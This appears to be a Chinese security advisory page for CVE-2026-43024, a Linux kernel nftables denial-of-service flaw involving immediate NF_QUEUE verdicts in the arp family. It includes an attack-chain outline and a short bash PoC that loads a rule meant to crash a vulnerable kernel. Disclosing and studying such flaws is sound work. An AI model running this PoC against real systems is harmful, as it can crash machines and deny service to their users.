IPBUF安全漏洞报告
English
CVE-2026-43024 CVSS 5.5 中危

CVE-2026-43024 Linux内核netfilter拒绝服务漏洞

披露日期: 2026-05-01
来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号
CVE-2026-43024
漏洞类型
拒绝服务
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Linux Kernel

相关标签

Linux KernelnetfilterDoSnftablesCVE-2026-43024

漏洞概述

Linux内核netfilter组件存在安全漏洞,涉及nftables对NF_QUEUE判决的处理。由于arp协议族不支持队列功能,但系统仍允许立即发出NF_QUEUE判决,攻击者可利用此逻辑缺陷导致系统崩溃或拒绝服务。该漏洞已通过全局拒绝立即NF_QUEUE判决的方式进行修复。

技术细节

该漏洞源于Linux内核netfilter框架中nftables对NF_QUEUE判决的实现逻辑缺陷。在nftables的设计中,NF_QUEUE判决通常应通过用户空间工具(如nft_queue)进行异步处理,然而内核未严格限制所有协议族(特别是arp家族)直接发出立即的NF_QUEUE判决。由于arp家族本身不支持队列操作,这种不匹配会导致内核处理路径异常或空指针引用。攻击者只需具备本地低权限(PR:L),即可构造特定的nftables规则,在arp表中设置立即NF_QUEUE verdict,从而触发内核崩溃或死锁,导致系统拒绝服务。

攻击链分析

STEP 1
获取本地访问
攻击者需要获取目标系统的本地低权限访问权限(PR:L)。
STEP 2
构造恶意规则
攻击者编写nftables规则,尝试在arp协议族中设置立即的NF_QUEUE判决。
STEP 3
执行利用代码
攻击者执行nft命令加载恶意规则,触发内核处理不支持的NF_QUEUE判决逻辑。
STEP 4
触发拒绝服务
内核在处理ARP家族的立即队列判决时发生异常,导致系统崩溃或服务不可用(A:H)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # PoC for CVE-2026-43024: Trigger immediate NF_QUEUE verdict on ARP family # This script attempts to add a rule that queues ARP packets immediately. # On vulnerable kernels, this may cause a crash or instability due to lack of queue support in arp. # Check if nft is installed if ! command -v nft &> /dev/null; then echo "nft command not found. This PoC requires nftables." exit 1 fi echo "[*] Creating ARP table..." nft add table arp filter 2>/dev/null || echo "Table might exist or permission denied." echo "[*] Adding chain to ARP table..." nft add chain arp filter input '{ type filter hook input priority 0 ; }' 2>/dev/null echo "[*] Adding malicious rule: immediate NF_QUEUE verdict..." # This rule attempts to use 'queue' which is not supported for immediate verdicts in ARP nft add rule arp filter input queue num 0 echo "[*] Rule added. If the kernel is vulnerable, it may panic or behave unexpectedly."

影响范围

Linux Kernel (CVE-2026-43024修复前的版本)

防御指南

临时缓解措施
限制非特权用户对nftables的访问权限,或监控并阻止包含立即NF_QUEUE判决的ARP规则加载。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表